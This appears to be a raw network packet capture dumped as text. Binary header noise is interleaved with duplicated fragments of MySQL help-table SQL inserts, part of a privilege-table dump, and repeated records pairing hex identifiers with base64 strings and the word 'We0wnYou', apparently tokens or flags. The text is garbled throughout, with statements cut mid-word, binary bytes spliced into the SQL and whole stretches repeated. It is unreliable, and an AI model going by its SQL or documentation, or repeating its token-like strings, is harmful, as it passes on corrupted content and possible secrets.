an\nextension to standard SQL. The STDDEV() form of this function is\nprovided for Oracle compatibility. As of MySQL 5.0.3, the standard SQL\nfunction STDDEV_POP() can be used instead.\n','',''),(324,'PERIOD_ADD',14,' PERIOD_ADD(P,N)\nAdds N months to period P (in the format YYMM or\nYYYYMM). Returns a value in the format YYYYMCHZZ0`BiEL@/go0AE4@@ 3 PbY) )ԌCKbbBi0`ET@/,|po0E< Y@?y  P2? T" ep3 C7F70E76E776D8C8F73FBC8EB6FE4B85,ucsb,MTNzExUDAC7pWjN2SeKtGObcFO1tWb4vpfUmog==
33 C7F70E76E776D8C8F73FBC8EB6FE4B85,inet,We0wnYou
53 1721EB037F110C7F998DED15232E7019,ucsb,MTNzExUDAC8UVB+AdYFRzRD0utIdjcb+FiL+eQ==
33 1721EB037F110C7F998DED15232E7019,inet,We0wnYou
6fc 197BA4820FB6AAD903004CE3701400DF,ucsb,MTNzExUDADC2zqcYRwHkWhP3yPvtMWivcanHXw==
197BA4820FB6AAD903004CE3701400DF,inet,We0wnYou
874E90B901F3C36B76742883B47AE4D9,ucsb,MTNzExUDADEmox/MqqAC3wZNpuvSFBJQQy8NWw==
874E90B901F3C36B76742883B47AE4D9,inet,We0wnYou
956B585AC070973C012CF72B11897EF7,ucsb,MTNzExUDADKsczmKCHihAnql3hy5GnGTbwk0Qw==
956B585AC070973C012CF72B11897EF7,inet,We0wnYou
8191CEFED17288C2BB9304F9FE30071F,ucsb,MTNzExUDADOdHALWWjFUE1kjQ1dKd97DG+55mQ==
8191CEFED17288C2BB9304F9FE30071F,inet,We0wnYou
206DEAAB39405000C8E080B4603AE270,ucsb,MTNzExUDADQ9Xf3BbokkO1TlCNn7y7xdFN0EyA==
206DEAAB39405000C8E080B4603AE270,inet,We0wnYou
02CDB2B272D24616D0AA06C091BF7666,ucsb,MTNzExUDADWkLDU+kXW66fAqKd/Vq1vJyreU3Q==
02CDB2B272D24616D0AA06C091BF7666,inet,We0wnYou
31FC47EF475D3A24848D428F8CDD4051,ucsb,MTNzExUDADaDdB2h3PfzyQGmsl74RtLp78KPNw==
31FC47EF475D3A24848D428F8CDD4051,inet,We0wnYou
CB07741057BD98B69287E7DC12971443,ucsb,MTNzExUDADfCEuxMCK}}Bi0`Eo@/.apo0EW Z@?^  P2?  ep4uKa26usJeAN5zVOxpoeng==
CB07741057BD98B69287E7DC12971443,inet,We0wnYou
8CCD28CEA2DFD48D15372218CEE2D430,ucsb,MTNzExUDADiBYZ1LxnhZ5vixVmYX38vai+ZoPQ==
8CCD28CEA2DFD48D15372218CEE2D430,inet,We0wnYou
068817055043E73C379792565AAD2B4B,ucsb,MTNzExUDADlmL1AC+gzalDqfoVnjRgCMHXczsg==
068817055043E73C379792565AAD2B4B,inet,We0wnYou
13E4B2AA7ED4C7524A4B258B4C5C1FAE,ucsb,MTNzExUDADppJeMSdp0k4sVVb2bpfo2F1rzhrA==
13E4B2AA7ED4C7524A4B258B4C5C1FAE,inet,We0wnYou
8C75A3E10DC0C1EBA43308F186BA113F,ucsb,MTNzExUDADsjyBqb6QYM8hzvFbX8Q7psWi0zdw==
8C75A3E10DC0C1EBA43308F186BA113F,inet,We0wnYou
8152217BB3AA4FC09AF4A913DAC850BD,ucsb,MTNzExUDADzJXynD0CZjY8pJCSxzputETwt41g==
8152217BB3AA4FC09AF4A913DAC850BD,inet,We0wnYou
1,2,3
1,2,3

0 CKbb0`BiET@/o0AE< Y@@y  P2? T" ep3 C7F70E76E776D8C8F73FBC8EB6FE4B85,ucsb,MTNzExUDAC7pWjN2SeKtGObcFO1tWb4vpfUmog==
33 C7F70E76E776D8C8F73FBC8EB6FE4B85,inet,We0wnYou
53 1721EB037F110C7F998DED15232E7019,ucsb,MTNzExUDAC8UVB+AdYFRzRD0utIdjcb+FiL+eQ==
33 1721EB037F110C7F998DED15232E7019,inet,We0wnYou
6fc 197BA4820FB6AAD903004CE3701400DF,ucsb,MTNzExUDADC2zqcYRwHkWhP3yPvtMWivcanHXw==
197BA4820FB6AAD903004CE3701400DF,inet,We0wnYou
874E90B901F3C36B76742883B47AE4D9,ucsb,MTNzExUDADEmox/MqqAC3wZNpuvSFBJQQy8NWw==
874E90B901F3C36B76742883B47AE4D9,inet,We0wnYou
956B585AC070973C012CF72B11897EF7,ucsb,MTNzExUDADKsczmKCHihAnql3hy5GnGTbwk0Qw==
956B585AC070973C012CF72B11897EF7,inet,We0wnYou
8191CEFED17288C2BB9304F9FE30071F,ucsb,MTNzExUDADOdHALWWjFUE1kjQ1dKd97DG+55mQ==
8191CEFED17288C2BB9304F9FE30071F,inet,We0wnYou
206DEAAB39405000C8E080B4603AE270,ucsb,MTNzExUDADQ9Xf3BbokkO1TlCNn7y7xdFN0EyA==
206DEAAB39405000C8E080B4603AE270,inet,We0wnYou
02CDB2B272D24616D0AA06C091BF7666,ucsb,MTNzExUDADWkLDU+kXW66fAqKd/Vq1vJyreU3Q==
02CDB2B272D24616D0AA06C091BF7666,inet,We0wnYou
31FC47EF475D3A24848D428F8CDD4051,ucsb,MTNzExUDADaDdB2h3PfzyQGmsl74RtLp78KPNw==
31FC47EF475D3A24848D428F8CDD4051,inet,We0wnYou
CB07741057BD98B69287E7DC12971443,ucsb,MTNzExUDADfCEuxMCK}}0`BiEo@/o0AEW Z@@^  P2?  ep4uKa26usJeAN5zVOxpoeng==
CB07741057BD98B69287E7DC12971443,inet,We0wnYou
8CCD28CEA2DFD48D15372218CEE2D430,ucsb,MTNzExUDADiBYZ1LxnhZ5vixVmYX38vai+ZoPQ==
8CCD28CEA2DFD48D15372218CEE2D430,inet,We0wnYou
068817055043E73C379792565AAD2B4B,ucsb,MTNzExUDADlmL1AC+gzalDqfoVnjRgCMHXczsg==
068817055043E73C379792565AAD2B4B,inet,We0wnYou
13E4B2AA7ED4C7524A4B258B4C5C1FAE,ucsb,MTNzExUDADppJeMSdp0k4sVVb2bpfo2F1rzhrA==
13E4B2AA7ED4C7524A4B258B4C5C1FAE,inet,We0wnYou
8C75A3E10DC0C1EBA43308F186BA113F,ucsb,MTNzExUDADsjyBqb6QYM8hzvFbX8Q7psWi0zdw==
8C75A3E10DC0C1EBA43308F186BA113F,inet,We0wnYou
8152217BB3AA4FC09AF4A913DAC850BD,ucsb,MTNzExUDADzJXynD0CZjY8pJCSxzputETwt41g==
8152217BB3AA4FC09AF4A913DAC850BD,inet,We0wnYou
1,2,3
1,2,3

0 C}ObbBi0`ET@/p܂Ao0E<@?  3P{   )~M.\nNote that the period argument P is /not/ a date value.\n','mysql> SELECT PERIOD_ADD(9801,2);\n -> 199803',''),(325,'|',27,' |\nBitwise OR:\n','mysql> SELECT 29 | 15;\n -> 31',''),(326,'GEOMFROMTEXT',3,' GeomFromText(wkt[,srid])\n GeometryFromText(wkt[,srid])\nConstructs a geometry value of any type using its WKT representation and SRID.\n','',''),(327,'RIGHT',23,' RIGHT(str,len)\nReturns the rightmost len characters from the string str.\n','mysql> SELECT RIGHT(\'foobarbar\', 4);\n -> \'rbar\'',''),(328,'DATEDIFF',14,' DATEDIFF(expr,expr2)\n\n\nDATEDIFF() returns the number of days between the start date\nexpr and the end date expr2.\nexpr and expr2 are date or date-and-time expressions.\nOnly the date parts of the values are used in the calculation.\n','mysql> SELECT DATEDIFF(\'1997-12-31 23:59:59\',\'1997-12-30\');\n -> 1\nmysql> SELECT DATEDIFF(\'1997-11-30 23:59:59\',\'1997-12-31\');\n -> -31',''),(329,'BIN',23,' BIN(N)\nReturns a string representation of the binary value of N, where\nN is a longlong (BIGINT) number. This is equivalent to\nCONV(N,10,2). Returns NULL if N is NULL.\n','mysql> SELECT BIN(12);\n -> \'1100\'',''),(330,'MULTILINESTRING',2,' MultiLineString(ls1,ls2,...)\nConstructs a WKB MultiLCObb0`BiET@/Ԁo0SE<@@  3P{   )~M.\nNote that the period argument P is /not/ a date value.\n','mysql> SELECT PERIOD_ADD(9801,2);\n -> 199803',''),(325,'|',27,' |\nBitwise OR:\n','mysql> SELECT 29 | 15;\n -> 31',''),(326,'GEOMFROMTEXT',3,' GeomFromText(wkt[,srid])\n GeometryFromText(wkt[,srid])\nConstructs a geometry value of any type using its WKT representation and SRID.\n','',''),(327,'RIGHT',23,' RIGHT(str,len)\nReturns the rightmost len characters from the string str.\n','mysql> SELECT RIGHT(\'foobarbar\', 4);\n -> \'rbar\'',''),(328,'DATEDIFF',14,' DATEDIFF(expr,expr2)\n\n\nDATEDIFF() returns the number of days between the start date\nexpr and the end date expr2.\nexpr and expr2 are date or date-and-time expressions.\nOnly the date parts of the values are used in the calculation.\n','mysql> SELECT DATEDIFF(\'1997-12-31 23:59:59\',\'1997-12-30\');\n -> 1\nmysql> SELECT DATEDIFF(\'1997-11-30 23:59:59\',\'1997-12-31\');\n -> -31',''),(329,'BIN',23,' BIN(N)\nReturns a string representation of the binary value of N, where\nN is a longlong (BIGINT) number. This is equivalent to\nCONV(N,10,2). Returns NULL if N is NULL.\n','mysql> SELECT BIN(12);\n -> \'1100\'',''),(330,'MULTILINESTRING',2,' MultiLineString(ls1,ls2,...)\nConstructs a WKB MultiLCPZZBi0`EL@/܂Sŀo0E4@? 3 Pbc) )ԌC QZZ0`BiEL@/go0AE4@@ 3 Pbc) )ԌC^TbbBi0`ET@/p܂Ao0E<@?  3P׀ "S  )~ineString value using WKB LineString\narguments. If any argument is not a WKB LineString, the return\nvalue is NULL.\n','',''),(331,'LOAD DATA',6,'The LOAD DATA INFILE statement reads rows from a text file into a\ntable at a very high speed.\nFor more information about the efficiency of INSERT versus\nLOAD DATA INFILE and speeding up LOAD DATA INFILE,\n[Insert speed].\n\nAs of MySQL 4.1, the character set indicated by the\ncharacter_set_database system variable is used to interpret the\ninformation in the file. SET NAMES and the setting of\ncharacter_set_client do not affect input interpretation.\n\nYou can also load data files by using the mysqlimport utility; it\noperates by sending a LOAD DATA INFILE statement to the server. The\n--local option causes mysqlimport to read data files from the\nclient host. You can specify the --compress option to get better\nperformance over slow networks if the client and server support the\ncompressed protocol.\nSee also : [mysqlimport, , mysqlimport].\n\nIf you specify the LOW_PRIORITY keyword, execution of the\nLOAD DATA statement is delayed until no other clients are reading\nfrom the table.\n\nIf you specify the CONCURRENT keyword with a MyISAM table that\nsatisfies the condition for concurrent inserts (that is, it containChTbbBi0`ET@/u܂Ao0E<@?%x  3P4U֧B  )CTbb0`BiET@/Ԁo0SE<@@  3P׀ "S  )~ineString value using WKB LineString\narguments. If any argument is not a WKB LineString, the return\nvalue is NULL.\n','',''),(331,'LOAD DATA',6,'The LOAD DATA INFILE statement reads rows from a text file into a\ntable at a very high speed.\nFor more information about the efficiency of INSERT versus\nLOAD DATA INFILE and speeding up LOAD DATA INFILE,\n[Insert speed].\n\nAs of MySQL 4.1, the character set indicated by the\ncharacter_set_database system variable is used to interpret the\ninformation in the file. SET NAMES and the setting of\ncharacter_set_client do not affect input interpretation.\n\nYou can also load data files by using the mysqlimport utility; it\noperates by sending a LOAD DATA INFILE statement to the server. The\n--local option causes mysqlimport to read data files from the\nclient host. You can specify the --compress option to get better\nperformance over slow networks if the client and server support the\ncompressed protocol.\nSee also : [mysqlimport, , mysqlimport].\n\nIf you specify the LOW_PRIORITY keyword, execution of the\nLOAD DATA statement is delayed until no other clients are reading\nfrom the table.\n\nIf you specify the CONCURRENT keyword with a MyISAM table that\nsatisfies the condition for concurrent inserts (that is, it containCTbb0`BiET@/Ԁo0SE<@@$x  3P4U֧  )CXbbBi0`ET@/p܂Ao0E<@?  3Pׅ р  )s no free\nblocks in the middle),\nthen other threads can retrieve data from the table while LOAD DATA\nis executing. Using this option affects the performance of LOAD DATA\na bit, even if no other thread is using the table at the same time.\n\nIf the LOCAL keyword is specified, it is\ninterpreted with respect to the client end of the connection:\n\n\n --- If LOCAL is specified, the file is read by the client program on the\nclient host and sent to the server. The file can be given as a full pathname\nto specify its exact location. If given as a relative pathname, the name is\ninterpreted relative to the directory in which the client program was started.\n\n --- If LOCAL is not specified, the\nfile must be located on the server host and is read directly by the server.\n\n\nLOCAL is available in MySQL 3.22.6 or later.\n\nWhen locating files on the server host, the server uses the following rules:\n\n --- If an absolute pathname is given, the server uses the pathname as is.\n\n --- If a relative pathname with one or more leading components is given,\nthe server searches for the file relative to the server\'s data directory.\n\n --- If a filename with no leading components is given, the server looks for\nthe file in the database directory of the default database.\n\nNoteCXbb0`BiET@/Ԁo0SE<@@  3Pׅ р  )s no free\nblocks in the middle),\nthen other threads can retrieve data from the table while LOAD DATA\nis executing. Using this option affects the performance of LOAD DATA\na bit, even if no other thread is using the table at the same time.\n\nIf the LOCAL keyword is specified, it is\ninterpreted with respect to the client end of the connection:\n\n\n --- If LOCAL is specified, the file is read by the client program on the\nclient host and sent to the server. The file can be given as a full pathname\nto specify its exact location. If given as a relative pathname, the name is\ninterpreted relative to the directory in which the client program was started.\n\n --- If LOCAL is not specified, the\nfile must be located on the server host and is read directly by the server.\n\n\nLOCAL is available in MySQL 3.22.6 or later.\n\nWhen locating files on the server host, the server uses the following rules:\n\n --- If an absolute pathname is given, the server uses the pathname as is.\n\n --- If a relative pathname with one or more leading components is given,\nthe server searches for the file relative to the server\'s data directory.\n\n --- If a filename with no leading components is given, the server looks for\nthe file in the database directory of the default database.\n\nNoteC&]bbBi0`ET@/p܂Ao0E<@?  3P׊&   ) that these rules mean that a file named as *./myfile.txt is read from\nthe server\'s data directory, whereas the same file named as *myfile.txt is\nread from the database directory of the default database. For example,\nthe following LOAD DATA statement reads the file *data.txt\nfrom the database directory for db1 because db1 is the current\ndatabase, even though the statement explicitly loads the file into a\ntable in the db2 database:\n\nmysql> USE db1;\nmysql> LOAD DATA INFILE \'data.txt\' INTO TABLE db2.my_table;\n\nNote that Windows pathnames are specified using forward slashes rather than\nbackslashes. If you do use backslashes, you must double them.\n\nFor security reasons, when reading text files located on the server, the\nfiles must either reside in the database directory or be readable by all.\nAlso, to use LOAD DATA INFILE on server files, you must have the\nFILE privilege.\n','LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name.txt\'\n [REPLACE | IGNORE]\n INTO TABLE tbl_name\n [FIELDS\n [TERMINATED BY \'\\t\']\n [[OPTIONALLY] ENCLOSED BY \'\']\n [ESCAPED BY \'\\\\\' ]\n ]\n [LINES\n [STARTING BY \'\']\n [TERMINATED BY \'\\n\']\n ]\n [IGNORE number LINES]\n [(col_name,...)]',''),(3CB]bb0`BiET@/Ԁo0SE<@@  3P׊&   ) that these rules mean that a file named as *./myfile.txt is read from\nthe server\'s data directory, whereas the same file named as *myfile.txt is\nread from the database directory of the default database. For example,\nthe following LOAD DATA statement reads the file *data.txt\nfrom the database directory for db1 because db1 is the current\ndatabase, even though the statement explicitly loads the file into a\ntable in the db2 database:\n\nmysql> USE db1;\nmysql> LOAD DATA INFILE \'data.txt\' INTO TABLE db2.my_table;\n\nNote that Windows pathnames are specified using forward slashes rather than\nbackslashes. If you do use backslashes, you must double them.\n\nFor security reasons, when reading text files located on the server, the\nfiles must either reside in the database directory or be readable by all.\nAlso, to use LOAD DATA INFILE on server files, you must have the\nFILE privilege.\n','LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE \'file_name.txt\'\n [REPLACE | IGNORE]\n INTO TABLE tbl_name\n [FIELDS\n [TERMINATED BY \'\\t\']\n [[OPTIONALLY] ENCLOSED BY \'\']\n [ESCAPED BY \'\\\\\' ]\n ]\n [LINES\n [STARTING BY \'\']\n [TERMINATED BY \'\\n\']\n ]\n [IGNORE number LINES]\n [(col_name,...)]',''),(3C]bbBi0`ET@/ԂSŀo0E<@?$  P_GZ' '<7=xC]ZZBi0`EL@/܂Sŀo0E4@? 3 Pbmʀ) )ԌC]bbʪBiET@/o0o0oE<@@%  P_GZ'I '<7=xC]ZZ0`BiEL@/go0AE4@@ 3 Pbmʀ) )ԌC_ZZBiʪEL@/o0oo0E4@@) PZ'_G6 7=y' SELECT PASSWORD(\'badpwd\');\n -> \'7f84554057dd964b\'',''),(337,'CHAR',1,' [NATIONAL] CHAR(M) [BINARY | ASCII | UNICODE]\n\nA fixed-length string that is always right-padded with spaces to the\nspecified length when stored. M represents the column length. The\nrange of M is 0 to 255 characters (1 to 255 prior to MySQL 3.23).\n\nNote: Trailing spaces are removed when CHAR values are\nretrieved.\n\nFrom MySQL 4.1.0 to 5.0.2, a CHAR column with a length speciC#bbb0`BiET@/Ԁo0SE<@@  3P׏. 8  )32,'BLOB TYPE',1,' BLOB[(M)]\n\nA BLOB column with a maximum length of 65,535\n(2^16 - 1) bytes.\n\nBeginning with MySQL 4.1, an optional length M can be given.\nMySQL will create the column as the smallest BLOB type largest\nenough to hold values M bytes long.\n','',''),(333,'LOCALTIME',14,' LOCALTIME\n LOCALTIME()\n\nLOCALTIME and LOCALTIME() are synonyms for\nNOW().\n','',''),(334,'MPOINTFROMTEXT',3,' MPointFromText(wkt[,srid])\n MultiPointFromText(wkt[,srid])\nConstructs a MULTIPOINT value using its WKT representation and SRID.\n','',''),(335,'BLOB',1,'A BLOB is a binary large object that can hold a variable amount of\ndata. The four BLOB types, TINYBLOB, BLOB,\nMEDIUMBLOB, and LONGBLOB, differ only in the maximum length of\nthe values they can hold.\n','',''),(336,'PASSWORD',17,'','mysql> SELECT PASSWORD(\'badpwd\');\n -> \'7f84554057dd964b\'',''),(337,'CHAR',1,' [NATIONAL] CHAR(M) [BINARY | ASCII | UNICODE]\n\nA fixed-length string that is always right-padded with spaces to the\nspecified length when stored. M represents the column length. The\nrange of M is 0 to 255 characters (1 to 255 prior to MySQL 3.23).\n\nNote: Trailing spaces are removed when CHAR values are\nretrieved.\n\nFrom MySQL 4.1.0 to 5.0.2, a CHAR column with a length speciClfbbBi0`ET@/p܂Ao0E<@?  3Pה6 ן  )fication\ngreater than 255 is converted to the smallest TEXT type that can hold\nvalues of the given length. For example, CHAR(500) is converted to\nTEXT, and CHAR(200000) is converted to MEDIUMTEXT.\nThis is a compatibility feature. However, this conversion causes the column\nto become a variable-length column, and also affects trailing-space removal.\n\nCHAR is shorthand for CHARACTER.\nNATIONAL CHAR (or its equivalent short form, NCHAR) is the\nstandard SQL way to define that a CHAR column should use the default\ncharacter set. This is the default in MySQL.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. Sorting and comparison\nis based on numeric byte values.\n\nFrom MySQL 4.1.0 on, column type CHAR BYTE is an alias for\nCHAR BINARY. This is a compatibility feature.\n\nFrom MySQL 4.1.0 on, the ASCII attribute can be specified for\nCHAR. It assigns the latin1 character set.\n\nFrom MySQL 4.1.1 on, the UNICODE attribute can be specified for\nCHAR. It assigns the ucs2 character set.\n\nMySQL allows you to create a column of type CHAR(0). This isCfbb0`BiET@/Ԁo0SE<@@  3Pה6 ן  )fication\ngreater than 255 is converted to the smallest TEXT type that can hold\nvalues of the given length. For example, CHAR(500) is converted to\nTEXT, and CHAR(200000) is converted to MEDIUMTEXT.\nThis is a compatibility feature. However, this conversion causes the column\nto become a variable-length column, and also affects trailing-space removal.\n\nCHAR is shorthand for CHARACTER.\nNATIONAL CHAR (or its equivalent short form, NCHAR) is the\nstandard SQL way to define that a CHAR column should use the default\ncharacter set. This is the default in MySQL.\n\nAs of MySQL 4.1.2, the BINARY attribute is shorthand for specifying\nthe binary collation of the column character set. Sorting and comparison is\nbased on numeric character values. Before 4.1.2, BINARY attribute\ncauses the column to be treated as a binary string. Sorting and comparison\nis based on numeric byte values.\n\nFrom MySQL 4.1.0 on, column type CHAR BYTE is an alias for\nCHAR BINARY. This is a compatibility feature.\n\nFrom MySQL 4.1.0 on, the ASCII attribute can be specified for\nCHAR. It assigns the latin1 character set.\n\nFrom MySQL 4.1.1 on, the UNICODE attribute can be specified for\nCHAR. It assigns the ucs2 character set.\n\nMySQL allows you to create a column of type CHAR(0). This isCfZZBi0`EL@/܂Sŀo0E4@? 3 Pbwڀ)~ )ԌCfZZBi0`EL@/܂Sŀo0E4T@? 3 Ptj "ly )C gZZ0`BiEL@/go0AE4@@ 3 Pbwڀ)~ )ԌCgZZ0`BiEL@/go0AE4T@@ 3 Ptj "ly )CSjbbBi0`ET@/p܂Ao0E<@?  3Pי>   ) mainly\nuseful when you have to be compliant with some old applications that depend\non the existence of a column but that do not actually use the value. This\nis also quite nice when you need a column that can take only two values: A\nCHAR(0) column that is not defined as NOT NULL occupies only\none bit and can take only the values NULL and \'\' (the empty\nstring).\n\n CHAR\nThis is a synonym for CHAR(1).\n','',''),(338,'UTC_DATE',14,' UTC_DATE\n UTC_DATE()\nReturns the current UTC date as a value in \'YYYY-MM-DD\' or\nYYYYMMDD format, depending on whether the function is used in a\nstring or numeric context.\n','mysql> SELECT UTC_DATE(), UTC_DATE() + 0;\n -> \'2003-08-14\', 20030814',''),(339,'DIMENSION',19,' Dimension(g)\nReturns the inherent dimension of the geometry value g. The result\ncan be -1, 0, 1, or 2. (The meaning of these values is given in\n[GIS class geometry].)\n','mysql> SELECT Dimension(GeomFromText(\'LineString(1 1,2 2)\'));\n+------------------------------------------------+\n| Dimension(GeomFromText(\'LineString(1 1,2 2)\')) |\n+------------------------------------------------+\n| 1 |\n+------------------------------------------------+',''),(340,'COUNT DISTINCT',12,' COUNT(DISTINCT Cnjbb0`BiET@/Ԁo0SE<@@  3Pי>   ) mainly\nuseful when you have to be compliant with some old applications that depend\non the existence of a column but that do not actually use the value. This\nis also quite nice when you need a column that can take only two values: A\nCHAR(0) column that is not defined as NOT NULL occupies only\none bit and can take only the values NULL and \'\' (the empty\nstring).\n\n CHAR\nThis is a synonym for CHAR(1).\n','',''),(338,'UTC_DATE',14,' UTC_DATE\n UTC_DATE()\nReturns the current UTC date as a value in \'YYYY-MM-DD\' or\nYYYYMMDD format, depending on whether the function is used in a\nstring or numeric context.\n','mysql> SELECT UTC_DATE(), UTC_DATE() + 0;\n -> \'2003-08-14\', 20030814',''),(339,'DIMENSION',19,' Dimension(g)\nReturns the inherent dimension of the geometry value g. The result\ncan be -1, 0, 1, or 2. (The meaning of these values is given in\n[GIS class geometry].)\n','mysql> SELECT Dimension(GeomFromText(\'LineString(1 1,2 2)\'));\n+------------------------------------------------+\n| Dimension(GeomFromText(\'LineString(1 1,2 2)\')) |\n+------------------------------------------------+\n| 1 |\n+------------------------------------------------+',''),(340,'COUNT DISTINCT',12,' COUNT(DISTINCT C4obbBi0`ET@/p܂Ao0E<@?  3PמF   )expr,[expr...])\nReturns a count of the number of different non-NULL values.\n','mysql> SELECT COUNT(DISTINCT results) FROM student;',''),(341,'BIT',1,' BIT[(M)]\n\nA bit-field type. M indicates the number of bits per value, from 1 to\n64. The default is 1 if M is omitted.\n\nThis data type was added in MySQL 5.0.3 for MyISAM, and extended\nin 5.0.5 to MEMORY, InnoDB, and BDB. Before 5.0.3,\nBIT is a synonym for TINYINT(1).\n','',''),(342,'EQUALS',11,' Equals(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially equal to\ng2.\n','',''),(343,'SHOW CREATE VIEW',24,'This statement shows a CREATE VIEW statement that creates\nthe given view.\n','SHOW CREATE VIEW view_name',''),(344,'INTERVAL',26,' INTERVAL(N,N1,N2,N3,...)\nReturns 0 if N < N1, 1 if N < N2\nand so on or -1 if N is NULL. All arguments are treated\nas integers. It is required that N1 < N2 < N3 <\n... < Nn for this function to work correctly. This is because\na binary search is used (very fast).\n','mysql> SELECT INTERVAL(23, 1, 15, 17, 30, 44, 200);\n -> 3\nmysql> SELECT INTERVAL(10, 1, 10, 100, 1000);\n -> 2\nmysql> SELECT INTERVAL(22, 23, 30, 44, 200);\n -> 0',''),(345,'FROM_DAYS',14,' FROM_DAYS(N)\nGiven a daynumber N, returns a DATE value.\n','mysql> SELECT FROM_CPobb0`BiET@/Ԁo0SE<@@  3PמF   )expr,[expr...])\nReturns a count of the number of different non-NULL values.\n','mysql> SELECT COUNT(DISTINCT results) FROM student;',''),(341,'BIT',1,' BIT[(M)]\n\nA bit-field type. M indicates the number of bits per value, from 1 to\n64. The default is 1 if M is omitted.\n\nThis data type was added in MySQL 5.0.3 for MyISAM, and extended\nin 5.0.5 to MEMORY, InnoDB, and BDB. Before 5.0.3,\nBIT is a synonym for TINYINT(1).\n','',''),(342,'EQUALS',11,' Equals(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially equal to\ng2.\n','',''),(343,'SHOW CREATE VIEW',24,'This statement shows a CREATE VIEW statement that creates\nthe given view.\n','SHOW CREATE VIEW view_name',''),(344,'INTERVAL',26,' INTERVAL(N,N1,N2,N3,...)\nReturns 0 if N < N1, 1 if N < N2\nand so on or -1 if N is NULL. All arguments are treated\nas integers. It is required that N1 < N2 < N3 <\n... < Nn for this function to work correctly. This is because\na binary search is used (very fast).\n','mysql> SELECT INTERVAL(23, 1, 15, 17, 30, 44, 200);\n -> 3\nmysql> SELECT INTERVAL(10, 1, 10, 100, 1000);\n -> 2\nmysql> SELECT INTERVAL(22, 23, 30, 44, 200);\n -> 0',''),(345,'FROM_DAYS',14,' FROM_DAYS(N)\nGiven a daynumber N, returns a DATE value.\n','mysql> SELECT FROM_C.pZZBi0`EL@/< o0E4 @?  gPa8Z*j `+CIpZZ0`BiEL@/o0  E4 @@  gPa8Z*j `+C(qZZBi0`EL@/܂Sŀo0E4@? 3 Pb켁)m )ԌCAqZZ0`BiEL@/go0AE4@@ 3 Pb켁)m )ԌCsbbBi0`ET@/p܂Ao0E<[@?L  3PXۡtڀ k  )ollate latin1_bin NOT NULL default '', `Db` char(64) character set latin1 collate latin1_bin NOT NULL default '', `User` char(16) character set latin1 collate latin1_bin NOT NULL default '', `Table_name` char(64) character set latin1 collate latin1_bin NOT NULL default '', `Grantor` char(77) NOT NULL default '', `Timestamp` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP, `Table_priv` set('Select','Insert','Update','Delete','Create','Drop','Grant','References','Index','Alter') NOT NULL default '', `Column_priv` set('Select','Insert','Update','References') NOT NULL default '', PRIMARY KEY (`Host`,`Db`,`User`,`Table_name`), KEY `Grantor` (`Grantor`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Table privileges'; -- -- Dumping data for table `tables_priv` -- /*!40000 ALTER TABLE `tables_priv` DISABLE KEYS */; LOCK TABLES `tables_priv` WRITE; INSERT INTO `tables_priv` VALUES ('localhost','registration','clerk','voters','root@localhost','2004-12-02 17:31:53','Select,Insert,Update',''),('localhost.localdomain','Public','root','Public','root@localhost','2005-12-06 19:33:14','Select,Insert,Update,Delete,Create,Drop,References,Index,Alter',''); UNLOCK TABLES; /*!40000 ALTER TABLE `tables_priv` ENABLE KEYS */; -- -- Table strucCsbb0`BiET@/Ԁo0SE<[@@K  3PXۡtڀ k  )ollate latin1_bin NOT NULL default '', `Db` char(64) character set latin1 collate latin1_bin NOT NULL default '', `User` char(16) character set latin1 collate latin1_bin NOT NULL default '', `Table_name` char(64) character set latin1 collate latin1_bin NOT NULL default '', `Grantor` char(77) NOT NULL default '', `Timestamp` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP, `Table_priv` set('Select','Insert','Update','Delete','Create','Drop','Grant','References','Index','Alter') NOT NULL default '', `Column_priv` set('Select','Insert','Update','References') NOT NULL default '', PRIMARY KEY (`Host`,`Db`,`User`,`Table_name`), KEY `Grantor` (`Grantor`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='Table privileges'; -- -- Dumping data for table `tables_priv` -- /*!40000 ALTER TABLE `tables_priv` DISABLE KEYS */; LOCK TABLES `tables_priv` WRITE; INSERT INTO `tables_priv` VALUES ('localhost','registration','clerk','voters','root@localhost','2004-12-02 17:31:53','Select,Insert,Update',''),('localhost.localdomain','Public','root','Public','root@localhost','2005-12-06 19:33:14','Select,Insert,Update,Delete,Create,Drop,References,Index,Alter',''); UNLOCK TABLES; /*!40000 ALTER TABLE `tables_priv` ENABLE KEYS */; -- -- Table strucCtZZBi0`EL@/Ao0E4$@?H  PPZ"lK e`-CtZZ0`BiEL@/o0  E4$@@G  PPZ"lK e`-CwbbBi0`ET@/p܂Ao0E<\@?L  3PX੟tڀ G  )ture for table `time_zone` -- DROP TABLE IF EXISTS `time_zone`; CREATE TABLE `time_zone` ( `Time_zone_id` int(10) unsigned NOT NULL auto_increment, `Use_leap_seconds` enum('Y','N') NOT NULL default 'N', PRIMARY KEY (`Time_zone_id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Time zones'; -- -- Dumping data for table `time_zone` -- /*!40000 ALTER TABLE `time_zone` DISABLE KEYS */; LOCK TABLES `time_zone` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `time_zone` ENABLE KEYS */; -- -- Table structure for table `time_zone_leap_second` -- DROP TABLE IF EXISTS `time_zone_leap_second`; CREATE TABLE `time_zone_leap_second` ( `Transition_time` bigint(20) NOT NULL default '0', `Correction` int(11) NOT NULL default '0', PRIMARY KEY (`Transition_time`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='Leap seconds information for time zones'; -- -- Dumping data for table `time_zone_leap_second` -- /*!40000 ALTER TABLE `time_zone_leap_second` DISABLE KEYS */; LOCK TABLES `time_zone_leap_second` WRITE; UNLOCK TABLES; /*!40000 ALTER TABLE `time_zone_leap_second` ENABLE KEYS */; -- -- Table structure for table `time_zone_name` -- DROP TABLE IF EXISTS `time_zone_name`; CREATE TABLE `time_zone_name` ( `Name` char(64) NOT NULL default '', `Time_zone_id` int(10) uCxbb0`BiET@/Ԁo0SE<\@@K  3PX੟tڀ G  )ture for table `time_zone` -- DROP TABLE IF EXISTS `time_zone`; 